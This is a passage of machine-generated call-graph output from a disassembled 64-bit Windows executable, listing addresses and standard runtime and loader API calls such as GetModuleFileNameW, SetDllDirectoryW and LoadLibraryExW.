15382->15387 15388 7ff6313f5bc1 15387->15388 15392 7ff6313efc91 15387->15392 15389 7ff6313e52d4 _get_daylight 11 API calls 15388->15389 15390 7ff6313f5bc6 15389->15390 15391 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15390->15391 15391->15392 15392->15370 15393 7ff6313f5be8 15392->15393 15394 7ff6313f5bf1 15393->15394 15395 7ff6313efca2 15393->15395 15396 7ff6313e52d4 _get_daylight 11 API calls 15394->15396 15395->15370 15399 7ff6313f5c18 15395->15399 15397 7ff6313f5bf6 15396->15397 15398 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15397->15398 15398->15395 15400 7ff6313f5c21 15399->15400 15401 7ff6313efcb3 15399->15401 15402 7ff6313e52d4 _get_daylight 11 API calls 15400->15402 15401->15370 15401->15377 15403 7ff6313f5c26 15402->15403 15404 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15403->15404 15404->15401 15413 7ff6313f0b68 EnterCriticalSection 15405->15413 15490 7ff6313dc02c 15513 7ff6313dc1fc 15490->15513 15493 7ff6313dc178 15613 7ff6313dc52c IsProcessorFeaturePresent 15493->15613 15494 7ff6313dc048 __scrt_acquire_startup_lock 15496 7ff6313dc182 15494->15496 15497 7ff6313dc066 15494->15497 15498 7ff6313dc52c 7 API calls 15496->15498 15505 7ff6313dc087 __scrt_release_startup_lock 15497->15505 15519 7ff6313e9c5c 15497->15519 15501 7ff6313dc18d __FrameHandler3::FrameUnwindToEmptyState 15498->15501 15500 7ff6313dc08b 15502 7ff6313dc111 15523 7ff6313dc678 15502->15523 15504 7ff6313dc116 15526 7ff6313d1000 15504->15526 15505->15500 15505->15502 15602 7ff6313e9f6c 15505->15602 15510 7ff6313dc139 15510->15501 15609 7ff6313dc390 15510->15609 15620 7ff6313dc7fc 15513->15620 15516 7ff6313dc040 15516->15493 15516->15494 15517 7ff6313dc22b __scrt_initialize_crt 15517->15516 15622 7ff6313dd948 15517->15622 15520 7ff6313e9c6f 15519->15520 15521 7ff6313e9c96 15520->15521 15649 7ff6313dbf40 15520->15649 15521->15505 15727 7ff6313dd090 15523->15727 15527 7ff6313d100b 15526->15527 15729 7ff6313d8660 15527->15729 15529 7ff6313d101d 15736 7ff6313e5da4 15529->15736 15531 7ff6313d397b 15743 7ff6313d1e50 15531->15743 15534 7ff6313d3a82 15536 7ff6313dbc70 _wfindfirst32i64 8 API calls 15534->15536 15537 7ff6313d3a96 15536->15537 15607 7ff6313dc6bc GetModuleHandleW 15537->15607 15538 7ff6313d399a 15538->15534 15759 7ff6313d7b10 15538->15759 15540 7ff6313d39cf 15541 7ff6313d3a1b 15540->15541 15543 7ff6313d7b10 61 API calls 15540->15543 15774 7ff6313d7ff0 15541->15774 15548 7ff6313d39f0 __std_exception_copy 15543->15548 15544 7ff6313d3a30 15778 7ff6313d1c50 15544->15778 15547 7ff6313d3b21 15550 7ff6313d3b45 15547->15550 15797 7ff6313d14f0 15547->15797 15548->15541 15551 7ff6313d7ff0 58 API calls 15548->15551 15549 7ff6313d1c50 121 API calls 15552 7ff6313d3a66 15549->15552 15550->15534 15554 7ff6313d3b9f 15550->15554 15804 7ff6313d8a90 15550->15804 15551->15541 15556 7ff6313d3a6a 15552->15556 15557 7ff6313d3aa8 15552->15557 15818 7ff6313d6d90 15554->15818 15879 7ff6313d2ad0 15556->15879 15557->15547 15892 7ff6313d3f80 15557->15892 15558 7ff6313d3b7c 15562 7ff6313d3b92 SetDllDirectoryW 15558->15562 15563 7ff6313d3b81 15558->15563 15562->15554 15566 7ff6313d2ad0 59 API calls 15563->15566 15566->15534 15568 7ff6313d3ac6 15573 7ff6313d2ad0 59 API calls 15568->15573 15569 7ff6313d3bb9 15595 7ff6313d3beb 15569->15595 15924 7ff6313d65a0 15569->15924 15571 7ff6313d3cb6 15822 7ff6313d3470 15571->15822 15572 7ff6313d3af4 15572->15547 15576 7ff6313d3af9 15572->15576 15573->15534 15911 7ff6313e013c 15576->15911 15580 7ff6313d3c0a 15586 7ff6313d3c55 15580->15586 15959 7ff6313d1e90 15580->15959 15581 7ff6313d3bed 15585 7ff6313d67f0 FreeLibrary 15581->15585 15585->15595 15586->15534 15963 7ff6313d3410 15586->15963 15588 7ff6313d3cde 15590 7ff6313d7b10 61 API calls 15588->15590 15593 7ff6313d3cea 15590->15593 15836 7ff6313d8030 15593->15836 15594 7ff6313d3c91 15596 7ff6313d67f0 FreeLibrary 15594->15596 15595->15571 15595->15580 15596->15534 15603 7ff6313e9fa4 15602->15603 15604 7ff6313e9f83 15602->15604 15605 7ff6313ea818 45 API calls 15603->15605 15604->15502 15606 7ff6313e9fa9 15605->15606 15608 7ff6313dc6cd 15607->15608 15608->15510 15610 7ff6313dc3a1 15609->15610 15611 7ff6313dc150 15610->15611 15612 7ff6313dd948 __scrt_initialize_crt 7 API calls 15610->15612 15611->15500 15612->15611 15614 7ff6313dc552 _wfindfirst32i64 memcpy_s 15613->15614 15615 7ff6313dc571 RtlCaptureContext RtlLookupFunctionEntry 15614->15615 15616 7ff6313dc59a RtlVirtualUnwind 15615->15616 15617 7ff6313dc5d6 memcpy_s 15615->15617 15616->15617 15618 7ff6313dc608 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15617->15618 15619 7ff6313dc65a _wfindfirst32i64 15618->15619 15619->15496 15621 7ff6313dc21e __scrt_dllmain_crt_thread_attach 15620->15621 15621->15516 15621->15517 15623 7ff6313dd950 15622->15623 15624 7ff6313dd95a 15622->15624 15628 7ff6313ddcc4 15623->15628 15624->15516 15629 7ff6313ddcd3 15628->15629 15630 7ff6313dd955 15628->15630 15636 7ff6313ddf00 15629->15636 15632 7ff6313ddd30 15630->15632 15633 7ff6313ddd5b 15632->15633 15634 7ff6313ddd5f 15633->15634 15635 7ff6313ddd3e DeleteCriticalSection 15633->15635 15634->15624 15635->15633 15640 7ff6313ddd68 15636->15640 15641 7ff6313dde82 TlsFree 15640->15641 15647 7ff6313dddac __vcrt_FlsAlloc 15640->15647 15642 7ff6313dddda LoadLibraryExW 15644 7ff6313dde51 15642->15644 15645 7ff6313dddfb GetLastError 15642->15645 15643 7ff6313dde71 GetProcAddress 15643->15641 15644->15643 15646 7ff6313dde68 FreeLibrary 15644->15646 15645->15647 15646->15643 15647->15641 15647->15642 15647->15643 15648 7ff6313dde1d LoadLibraryExW 15647->15648 15648->15644 15648->15647 15650 7ff6313dbf50 15649->15650 15666 7ff6313e9fe8 15650->15666 15652 7ff6313dbf5c 15672 7ff6313dc248 15652->15672 15654 7ff6313dc52c 7 API calls 15656 7ff6313dbff5 15654->15656 15655 7ff6313dbf74 _RTC_Initialize 15664 7ff6313dbfc9 15655->15664 15677 7ff6313dc3f8 15655->15677 15656->15520 15658 7ff6313dbf89 15680 7ff6313e9454 15658->15680 15664->15654 15665 7ff6313dbfe5 15664->15665 15665->15520 15667 7ff6313e9ff9 15666->15667 15668 7ff6313ea001 15667->15668 15669 7ff6313e52d4 _get_daylight 11 API calls 15667->15669 15668->15652 15670 7ff6313ea010 15669->15670 15671 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15670->15671 15671->15668 15673 7ff6313dc259 15672->15673 15676 7ff6313dc25e __scrt_release_startup_lock 15672->15676 15674 7ff6313dc52c 7 API calls 15673->15674 15673->15676 15675 7ff6313dc2d2 15674->15675 15676->15655 15706 7ff6313dc3bc 15677->15706 15679 7ff6313dc401 15679->15658 15681 7ff6313e9474 15680->15681 15688 7ff6313dbf95 15680->15688 15682 7ff6313e9492 GetModuleFileNameW 15681->15682 15683 7ff6313e947c 15681->15683 15687 7ff6313e94bd 15682->15687 15684 7ff6313e52d4 _get_daylight 11 API calls 15683->15684 15685 7ff6313e9481 15684->15685 15686 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15685->15686 15686->15688 15721 7ff6313e93f4 15687->15721 15688->15664 15705 7ff6313dc4cc InitializeSListHead 15688->15705 15691 7ff6313e9505 15692 7ff6313e52d4 _get_daylight 11 API calls 15691->15692 15693 7ff6313e950a 15692->15693 15694 7ff6313eadbc __free_lconv_mon 11 API calls 15693->15694 15697 7ff6313e9518 15694->15697 15695 7ff6313e951d 15696 7ff6313e953f 15695->15696 15699 7ff6313e9584 15695->15699 15700 7ff6313e956b 15695->15700 15698 7ff6313eadbc __free_lconv_mon 11 API calls 15696->15698 15697->15688 15698->15688 15703 7ff6313eadbc __free_lconv_mon 11 API calls 15699->15703 15701 7ff6313eadbc __free_lconv_mon 11 API calls 15700->15701 15702 7ff6313e9574 15701->15702 15704 7ff6313eadbc __free_lconv_mon 11 API calls 15702->15704 15703->15696 15704->15697 15707 7ff6313dc3d6 15706->15707 15709 7ff6313dc3cf 15706->15709 15710 7ff6313ea62c 15707->15710 15709->15679 15713 7ff6313ea268 15710->15713 15720 7ff6313f0b68 EnterCriticalSection 15713->15720 15722 7ff6313e940c 15721->15722 15723 7ff6313e9444 15721->15723 15722->15723 15724 7ff6313ef008 _get_daylight 11 API calls 15722->15724 15723->15691 15723->15695 15725 7ff6313e943a 15724->15725 15726 7ff6313eadbc __free_lconv_mon 11 API calls 15725->15726 15726->15723 15728 7ff6313dc68f GetStartupInfoW 15727->15728 15728->15504 15731 7ff6313d867f 15729->15731 15730 7ff6313d86d0 WideCharToMultiByte 15730->15731 15733 7ff6313d8776 15730->15733 15731->15730 15732 7ff6313d8724 WideCharToMultiByte 15731->15732 15731->15733 15735 7ff6313d8687 __std_exception_copy 15731->15735 15732->15731 15732->15733 15997 7ff6313d2980 15733->15997 15735->15529 15738 7ff6313eff00 15736->15738 15737 7ff6313eff53 15739 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 15737->15739 15738->15737 15740 7ff6313effa6 15738->15740 15742 7ff6313eff7c 15739->15742 16356 7ff6313efdd8 15740->16356 15742->15531 15744 7ff6313d1e65 15743->15744 15745 7ff6313d1e80 15744->15745 16364 7ff6313d2830 15744->16364 15745->15534 15747 7ff6313d3e70 15745->15747 15748 7ff6313dbc10 15747->15748 15749 7ff6313d3e7c GetModuleFileNameW 15748->15749 15750 7ff6313d3ec2 15749->15750 15751 7ff6313d3eab 15749->15751 16404 7ff6313d8ba0 15750->16404 15752 7ff6313d2980 57 API calls 15751->15752 15757 7ff6313d3ebe 15752->15757 15755 7ff6313dbc70 _wfindfirst32i64 8 API calls 15758 7ff6313d3eff 15755->15758 15756 7ff6313d2ad0 59 API calls 15756->15757 15757->15755 15758->15538 15760 7ff6313d7b1a 15759->15760 15761 7ff6313d8a90 57 API calls 15760->15761 15762 7ff6313d7b3c GetEnvironmentVariableW 15761->15762 15763 7ff6313d7b54 ExpandEnvironmentStringsW 15762->15763 15764 7ff6313d7ba6 15762->15764 15765 7ff6313d8ba0 59 API calls 15763->15765 15766 7ff6313dbc70 _wfindfirst32i64 8 API calls 15764->15766 15768 7ff6313d7b7c 15765->15768 15767 7ff6313d7bb8 15766->15767 15767->15540 15768->15764 15769 7ff6313d7b86 15768->15769 16415 7ff6313ea84c 15769->16415 15772 7ff6313dbc70 _wfindfirst32i64 8 API calls 15773 7ff6313d7b9e 15772->15773 15773->15540 15775 7ff6313d8a90 57 API calls 15774->15775 15776 7ff6313d8007 SetEnvironmentVariableW 15775->15776 15777 7ff6313d801f __std_exception_copy 15776->15777 15777->15544 15779 7ff6313d1c5e 15778->15779 15780 7ff6313d1e90 49 API calls 15779->15780 15781 7ff6313d1c94 15780->15781 15782 7ff6313d1d7e 15781->15782 15783 7ff6313d1e90 49 API calls 15781->15783 15785 7ff6313dbc70 _wfindfirst32i64 8 API calls 15782->15785 15784 7ff6313d1cba 15783->15784 15784->15782 16422 7ff6313d1a40 15784->16422 15786 7ff6313d1e0c 15785->15786 15786->15547 15786->15549 15790 7ff6313d1d6c 15791 7ff6313d3df0 49 API calls 15790->15791 15791->15782 15792 7ff6313d1d2f 15792->15790 15793 7ff6313d1dd4 15792->15793 15794 7ff6313d3df0 49 API calls 15793->15794 15795 7ff6313d1de1 15794->15795 16458 7ff6313d4000 15795->16458 15798 7ff6313d1506 15797->15798 15801 7ff6313d157f 15797->15801 16500 7ff6313d7900 15798->16500 15801->15550 15802 7ff6313d2ad0 59 API calls 15803 7ff6313d1564 15802->15803 15803->15550 15805 7ff6313d8ab1 MultiByteToWideChar 15804->15805 15806 7ff6313d8b37 MultiByteToWideChar 15804->15806 15807 7ff6313d8afc 15805->15807 15808 7ff6313d8ad7 15805->15808 15809 7ff6313d8b7f 15806->15809 15810 7ff6313d8b5a 15806->15810 15807->15806 15815 7ff6313d8b12 15807->15815 15811 7ff6313d2980 55 API calls 15808->15811 15809->15558 15812 7ff6313d2980 55 API calls 15810->15812 15813 7ff6313d8aea 15811->15813 15814 7ff6313d8b6d 15812->15814 15813->15558 15814->15558 15816 7ff6313d2980 55 API calls 15815->15816 15817 7ff6313d8b25 15816->15817 15817->15558 15819 7ff6313d6da5 15818->15819 15820 7ff6313d3ba4 15819->15820 15821 7ff6313d2830 59 API calls 15819->15821 15820->15595 15915 7ff6313d6a40 15820->15915 15821->15820 15826 7ff6313d34e3 15822->15826 15828 7ff6313d3524 15822->15828 15823 7ff6313dbc70 _wfindfirst32i64 8 API calls 15824 7ff6313d3575 15823->15824 15824->15534 15829 7ff6313d7f80 15824->15829 15826->15828 17033 7ff6313d1710 15826->17033 17075 7ff6313d2d10 15826->17075 15828->15823 15830 7ff6313d8a90 57 API calls 15829->15830 15831 7ff6313d7f9f 15830->15831 15832 7ff6313d8a90 57 API calls 15831->15832 15833 7ff6313d7faf 15832->15833 15834 7ff6313e7c9c 38 API calls 15833->15834 15835 7ff6313d7fbd __std_exception_copy 15834->15835 15835->15588 15837 7ff6313d8040 15836->15837 15838 7ff6313d8a90 57 API calls 15837->15838 15880 7ff6313d2af0 15879->15880 15881 7ff6313e4a74 49 API calls 15880->15881 15882 7ff6313d2b3b memcpy_s 15881->15882 15883 7ff6313d8a90 57 API calls 15882->15883 15884 7ff6313d2b70 15883->15884 15885 7ff6313d2b75 15884->15885 15886 7ff6313d2bad MessageBoxA 15884->15886 15887 7ff6313d8a90 57 API calls 15885->15887 15888 7ff6313d2bc7 15886->15888 15889 7ff6313d2b8f MessageBoxW 15887->15889 15890 7ff6313dbc70 _wfindfirst32i64 8 API calls 15888->15890 15889->15888 15891 7ff6313d2bd7 15890->15891 15891->15534 15893 7ff6313d3f8c 15892->15893 15894 7ff6313d8a90 57 API calls 15893->15894 15895 7ff6313d3fb7 15894->15895 15896 7ff6313d8a90 57 API calls 15895->15896 15897 7ff6313d3fca 15896->15897 17604 7ff6313e6358 15897->17604 15900 7ff6313dbc70 _wfindfirst32i64 8 API calls 15901 7ff6313d3abe 15900->15901 15901->15568 15902 7ff6313d8260 15901->15902 15903 7ff6313d8284 15902->15903 15904 7ff6313e07c4 73 API calls 15903->15904 15906 7ff6313d835b __std_exception_copy 15903->15906 15905 7ff6313d829e 15904->15905 15905->15906 17983 7ff6313e8f20 15905->17983 15906->15572 15912 7ff6313e016c 15911->15912 17998 7ff6313dff18 15912->17998 15916 7ff6313d6a63 15915->15916 15917 7ff6313d6a7a 15915->15917 15916->15917 18009 7ff6313d15a0 15916->18009 15917->15569 15919 7ff6313d6a84 15919->15917 15920 7ff6313d4000 49 API calls 15919->15920 15921 7ff6313d6ae5 15920->15921 15922 7ff6313d2ad0 59 API calls 15921->15922 15923 7ff6313d6b55 __std_exception_copy memcpy_s 15921->15923 15922->15917 15923->15569 15927 7ff6313d65ba memcpy_s 15924->15927 15925 7ff6313d66df 15926 7ff6313d4000 49 API calls 15925->15926 15929 7ff6313d6758 15926->15929 15927->15925 15928 7ff6313d66fb 15927->15928 15931 7ff6313d4000 49 API calls 15927->15931 15932 7ff6313d66c0 15927->15932 15940 7ff6313d1710 144 API calls 15927->15940 15941 7ff6313d66e1 15927->15941 15930 7ff6313d2ad0 59 API calls 15928->15930 15933 7ff6313d4000 49 API calls 15929->15933 15935 7ff6313d66f1 __std_exception_copy 15930->15935 15931->15927 15932->15925 15934 7ff6313d4000 49 API calls 15932->15934 15937 7ff6313d6788 15933->15937 15934->15925 15936 7ff6313dbc70 _wfindfirst32i64 8 API calls 15935->15936 15938 7ff6313d3bca 15936->15938 15939 7ff6313d4000 49 API calls 15937->15939 15938->15581 15943 7ff6313d6520 15938->15943 15939->15935 15940->15927 15942 7ff6313d2ad0 59 API calls 15941->15942 15942->15935 18033 7ff6313d8210 15943->18033 15945 7ff6313d653c 15946 7ff6313d8210 58 API calls 15945->15946 15947 7ff6313d654f 15946->15947 15948 7ff6313d6585 15947->15948 15949 7ff6313d6567 15947->15949 15950 7ff6313d2ad0 59 API calls 15948->15950 18037 7ff6313d6ea0 GetProcAddress 15949->18037 15960 7ff6313d1eb5 15959->15960 15961 7ff6313e4a74 49 API calls 15960->15961 15962 7ff6313d1ed8 15961->15962 15962->15586 18096 7ff6313d5b70 15963->18096 15966 7ff6313d345d 15966->15594 16016 7ff6313dbc10 15997->16016 16000 7ff6313d29c9 16018 7ff6313e4a74 16000->16018 16005 7ff6313d1e90 49 API calls 16006 7ff6313d2a26 memcpy_s 16005->16006 16007 7ff6313d8a90 54 API calls 16006->16007 16008 7ff6313d2a5b 16007->16008 16009 7ff6313d2a60 16008->16009 16010 7ff6313d2a98 MessageBoxA 16008->16010 16011 7ff6313d8a90 54 API calls 16009->16011 16012 7ff6313d2ab2 16010->16012 16013 7ff6313d2a7a MessageBoxW 16011->16013 16014 7ff6313dbc70 _wfindfirst32i64 8 API calls 16012->16014 16013->16012 16015 7ff6313d2ac2 16014->16015 16015->15735 16017 7ff6313d299c GetLastError 16016->16017 16017->16000 16022 7ff6313e4ace 16018->16022 16019 7ff6313e4af3 16020 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16019->16020 16035 7ff6313e4b1d 16020->16035 16021 7ff6313e4b2f 16048 7ff6313e2d00 16021->16048 16022->16019 16022->16021 16025 7ff6313e4c0c 16027 7ff6313eadbc __free_lconv_mon 11 API calls 16025->16027 16026 7ff6313dbc70 _wfindfirst32i64 8 API calls 16028 7ff6313d29f7 16026->16028 16027->16035 16036 7ff6313d8510 16028->16036 16029 7ff6313e4be1 16032 7ff6313eadbc __free_lconv_mon 11 API calls 16029->16032 16030 7ff6313e4c30 16030->16025 16031 7ff6313e4c3a 16030->16031 16034 7ff6313eadbc __free_lconv_mon 11 API calls 16031->16034 16032->16035 16033 7ff6313e4bd8 16033->16025 16033->16029 16034->16035 16035->16026 16037 7ff6313d851c 16036->16037 16038 7ff6313d853d FormatMessageW 16037->16038 16039 7ff6313d8537 GetLastError 16037->16039 16040 7ff6313d8570 16038->16040 16041 7ff6313d858c WideCharToMultiByte 16038->16041 16039->16038 16042 7ff6313d2980 54 API calls 16040->16042 16043 7ff6313d8583 16041->16043 16044 7ff6313d85c6 16041->16044 16042->16043 16046 7ff6313dbc70 _wfindfirst32i64 8 API calls 16043->16046 16045 7ff6313d2980 54 API calls 16044->16045 16045->16043 16047 7ff6313d29fe 16046->16047 16047->16005 16049 7ff6313e2d3e 16048->16049 16054 7ff6313e2d2e 16048->16054 16050 7ff6313e2d47 16049->16050 16058 7ff6313e2d75 16049->16058 16051 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16050->16051 16053 7ff6313e2d6d 16051->16053 16052 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16052->16053 16053->16025 16053->16029 16053->16030 16053->16033 16054->16052 16057 7ff6313e3024 16060 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16057->16060 16058->16053 16058->16054 16058->16057 16062 7ff6313e3690 16058->16062 16088 7ff6313e3358 16058->16088 16118 7ff6313e2be0 16058->16118 16121 7ff6313e48b0 16058->16121 16060->16054 16063 7ff6313e36d2 16062->16063 16064 7ff6313e3745 16062->16064 16065 7ff6313e376f 16063->16065 16066 7ff6313e36d8 16063->16066 16067 7ff6313e379f 16064->16067 16068 7ff6313e374a 16064->16068 16145 7ff6313e1c40 16065->16145 16073 7ff6313e36dd 16066->16073 16079 7ff6313e37ae 16066->16079 16067->16065 16067->16079 16086 7ff6313e3708 16067->16086 16069 7ff6313e377f 16068->16069 16070 7ff6313e374c 16068->16070 16152 7ff6313e1830 16069->16152 16072 7ff6313e36ed 16070->16072 16078 7ff6313e375b 16070->16078 16087 7ff6313e37dd 16072->16087 16127 7ff6313e3ff4 16072->16127 16073->16072 16076 7ff6313e3720 16073->16076 16073->16086 16076->16087 16137 7ff6313e44b0 16076->16137 16078->16065 16081 7ff6313e3760 16078->16081 16079->16087 16159 7ff6313e2050 16079->16159 16081->16087 16141 7ff6313e4648 16081->16141 16082 7ff6313dbc70 _wfindfirst32i64 8 API calls 16084 7ff6313e3a73 16082->16084 16084->16058 16086->16087 16166 7ff6313eecc8 16086->16166 16087->16082 16089 7ff6313e3363 16088->16089 16090 7ff6313e3379 16088->16090 16091 7ff6313e33b7 16089->16091 16092 7ff6313e36d2 16089->16092 16093 7ff6313e3745 16089->16093 16090->16091 16094 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16090->16094 16091->16058 16095 7ff6313e376f 16092->16095 16096 7ff6313e36d8 16092->16096 16097 7ff6313e379f 16093->16097 16098 7ff6313e374a 16093->16098 16094->16091 16101 7ff6313e1c40 38 API calls 16095->16101 16105 7ff6313e36dd 16096->16105 16107 7ff6313e37ae 16096->16107 16097->16095 16097->16107 16116 7ff6313e3708 16097->16116 16099 7ff6313e377f 16098->16099 16100 7ff6313e374c 16098->16100 16103 7ff6313e1830 38 API calls 16099->16103 16102 7ff6313e36ed 16100->16102 16109 7ff6313e375b 16100->16109 16101->16116 16104 7ff6313e3ff4 47 API calls 16102->16104 16117 7ff6313e37dd 16102->16117 16103->16116 16104->16116 16105->16102 16106 7ff6313e3720 16105->16106 16105->16116 16110 7ff6313e44b0 47 API calls 16106->16110 16106->16117 16108 7ff6313e2050 38 API calls 16107->16108 16107->16117 16108->16116 16109->16095 16111 7ff6313e3760 16109->16111 16110->16116 16113 7ff6313e4648 37 API calls 16111->16113 16111->16117 16112 7ff6313dbc70 _wfindfirst32i64 8 API calls 16114 7ff6313e3a73 16112->16114 16113->16116 16114->16058 16115 7ff6313eecc8 47 API calls 16115->16116 16116->16115 16116->16117 16117->16112 16315 7ff6313e0e04 16118->16315 16122 7ff6313e48c7 16121->16122 16332 7ff6313ede28 16122->16332 16128 7ff6313e4016 16127->16128 16176 7ff6313e0c70 16128->16176 16133 7ff6313e4153 16135 7ff6313e41dc 16133->16135 16136 7ff6313e48b0 45 API calls 16133->16136 16134 7ff6313e48b0 45 API calls 16134->16133 16135->16086 16136->16135 16138 7ff6313e4530 16137->16138 16139 7ff6313e44c8 16137->16139 16138->16086 16139->16138 16140 7ff6313eecc8 47 API calls 16139->16140 16140->16138 16143 7ff6313e4669 16141->16143 16142 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16144 7ff6313e469a 16142->16144 16143->16142 16143->16144 16144->16086 16146 7ff6313e1c73 16145->16146 16147 7ff6313e1ca2 16146->16147 16149 7ff6313e1d5f 16146->16149 16148 7ff6313e0c70 12 API calls 16147->16148 16151 7ff6313e1cdf 16147->16151 16148->16151 16150 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16149->16150 16150->16151 16151->16086 16153 7ff6313e1863 16152->16153 16154 7ff6313e1892 16153->16154 16156 7ff6313e194f 16153->16156 16155 7ff6313e0c70 12 API calls 16154->16155 16158 7ff6313e18cf 16154->16158 16155->16158 16157 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16156->16157 16157->16158 16158->16086 16160 7ff6313e2083 16159->16160 16161 7ff6313e20b2 16160->16161 16164 7ff6313e216f 16160->16164 16162 7ff6313e20ef 16161->16162 16163 7ff6313e0c70 12 API calls 16161->16163 16162->16086 16163->16162 16165 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16164->16165 16165->16162 16167 7ff6313eecf0 16166->16167 16168 7ff6313e48b0 45 API calls 16167->16168 16169 7ff6313eed35 16167->16169 16172 7ff6313eecf5 memcpy_s 16167->16172 16174 7ff6313eed1e memcpy_s 16167->16174 16168->16169 16169->16172 16169->16174 16312 7ff6313f0378 16169->16312 16170 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16170->16172 16172->16086 16174->16170 16174->16172 16177 7ff6313e0c96 16176->16177 16178 7ff6313e0ca7 16176->16178 16184 7ff6313ee9e0 16177->16184 16178->16177 16179 7ff6313eda6c _fread_nolock 12 API calls 16178->16179 16180 7ff6313e0cd4 16179->16180 16181 7ff6313e0ce8 16180->16181 16182 7ff6313eadbc __free_lconv_mon 11 API calls 16180->16182 16183 7ff6313eadbc __free_lconv_mon 11 API calls 16181->16183 16182->16181 16183->16177 16185 7ff6313eea30 16184->16185 16186 7ff6313ee9fd 16184->16186 16185->16186 16188 7ff6313eea62 16185->16188 16187 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16186->16187 16196 7ff6313e4131 16187->16196 16194 7ff6313eeb75 16188->16194 16201 7ff6313eeaaa 16188->16201 16189 7ff6313eec67 16239 7ff6313edecc 16189->16239 16191 7ff6313eec2d 16232 7ff6313ee264 16191->16232 16193 7ff6313eebfc 16225 7ff6313ee544 16193->16225 16194->16189 16194->16191 16194->16193 16195 7ff6313eebbf 16194->16195 16198 7ff6313eebb5 16194->16198 16215 7ff6313ee774 16195->16215 16196->16133 16196->16134 16198->16191 16200 7ff6313eebba 16198->16200 16200->16193 16200->16195 16201->16196 16206 7ff6313ea8ec 16201->16206 16204 7ff6313ead74 _wfindfirst32i64 17 API calls 16205 7ff6313eecc4 16204->16205 16207 7ff6313ea903 16206->16207 16208 7ff6313ea8f9 16206->16208 16209 7ff6313e52d4 _get_daylight 11 API calls 16207->16209 16208->16207 16210 7ff6313ea91e 16208->16210 16214 7ff6313ea90a 16209->16214 16212 7ff6313ea916 16210->16212 16213 7ff6313e52d4 _get_daylight 11 API calls 16210->16213 16211 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16211->16212 16212->16196 16212->16204 16213->16214 16214->16211 16248 7ff6313f45cc 16215->16248 16219 7ff6313ee81c 16220 7ff6313ee871 16219->16220 16222 7ff6313ee83c 16219->16222 16224 7ff6313ee820 16219->16224 16301 7ff6313ee360 16220->16301 16297 7ff6313ee61c 16222->16297 16224->16196 16226 7ff6313f45cc 38 API calls 16225->16226 16227 7ff6313ee58e 16226->16227 16228 7ff6313f4014 37 API calls 16227->16228 16229 7ff6313ee5de 16228->16229 16230 7ff6313ee5e2 16229->16230 16231 7ff6313ee61c 45 API calls 16229->16231 16230->16196 16231->16230 16233 7ff6313f45cc 38 API calls 16232->16233 16234 7ff6313ee2af 16233->16234 16235 7ff6313f4014 37 API calls 16234->16235 16236 7ff6313ee307 16235->16236 16237 7ff6313ee30b 16236->16237 16238 7ff6313ee360 45 API calls 16236->16238 16237->16196 16238->16237 16240 7ff6313edf44 16239->16240 16241 7ff6313edf11 16239->16241 16243 7ff6313edf5c 16240->16243 16245 7ff6313edfdd 16240->16245 16242 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16241->16242 16247 7ff6313edf3d memcpy_s 16242->16247 16244 7ff6313ee264 46 API calls 16243->16244 16244->16247 16246 7ff6313e48b0 45 API calls 16245->16246 16245->16247 16246->16247 16247->16196 16249 7ff6313f461f fegetenv 16248->16249 16250 7ff6313f852c 37 API calls 16249->16250 16253 7ff6313f4672 16250->16253 16251 7ff6313f469f 16255 7ff6313ea8ec __std_exception_copy 37 API calls 16251->16255 16252 7ff6313f4762 16254 7ff6313f852c 37 API calls 16252->16254 16253->16252 16258 7ff6313f473c 16253->16258 16259 7ff6313f468d 16253->16259 16256 7ff6313f478c 16254->16256 16257 7ff6313f471d 16255->16257 16260 7ff6313f852c 37 API calls 16256->16260 16262 7ff6313f5844 16257->16262 16267 7ff6313f4725 16257->16267 16263 7ff6313ea8ec __std_exception_copy 37 API calls 16258->16263 16259->16251 16259->16252 16261 7ff6313f479d 16260->16261 16264 7ff6313f8720 20 API calls 16261->16264 16265 7ff6313ead74 _wfindfirst32i64 17 API calls 16262->16265 16263->16257 16275 7ff6313f4806 memcpy_s 16264->16275 16266 7ff6313f5859 16265->16266 16268 7ff6313dbc70 _wfindfirst32i64 8 API calls 16267->16268 16269 7ff6313ee7c1 16268->16269 16293 7ff6313f4014 16269->16293 16270 7ff6313f4baf memcpy_s 16271 7ff6313f4847 memcpy_s 16289 7ff6313f4ca3 memcpy_s 16271->16289 16290 7ff6313f518b memcpy_s 16271->16290 16272 7ff6313f4eef 16273 7ff6313f4130 37 API calls 16272->16273 16279 7ff6313f5607 16273->16279 16274 7ff6313f4e9b 16274->16272 16276 7ff6313f585c memcpy_s 37 API calls 16274->16276 16275->16270 16275->16271 16277 7ff6313e52d4 _get_daylight 11 API calls 16275->16277 16276->16272 16278 7ff6313f4c80 16277->16278 16280 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16278->16280 16281 7ff6313f585c memcpy_s 37 API calls 16279->16281 16286 7ff6313f5662 16279->16286 16280->16271 16281->16286 16282 7ff6313f57e8 16284 7ff6313f852c 37 API calls 16282->16284 16283 7ff6313e52d4 11 API calls _get_daylight 16283->16290 16284->16267 16285 7ff6313e52d4 11 API calls _get_daylight 16285->16289 16286->16282 16287 7ff6313f4130 37 API calls 16286->16287 16292 7ff6313f585c memcpy_s 37 API calls 16286->16292 16287->16286 16288 7ff6313ead54 37 API calls _invalid_parameter_noinfo 16288->16290 16289->16274 16289->16285 16291 7ff6313ead54 37 API calls _invalid_parameter_noinfo 16289->16291 16290->16272 16290->16274 16290->16283 16290->16288 16291->16289 16292->16286 16294 7ff6313f4033 16293->16294 16295 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16294->16295 16296 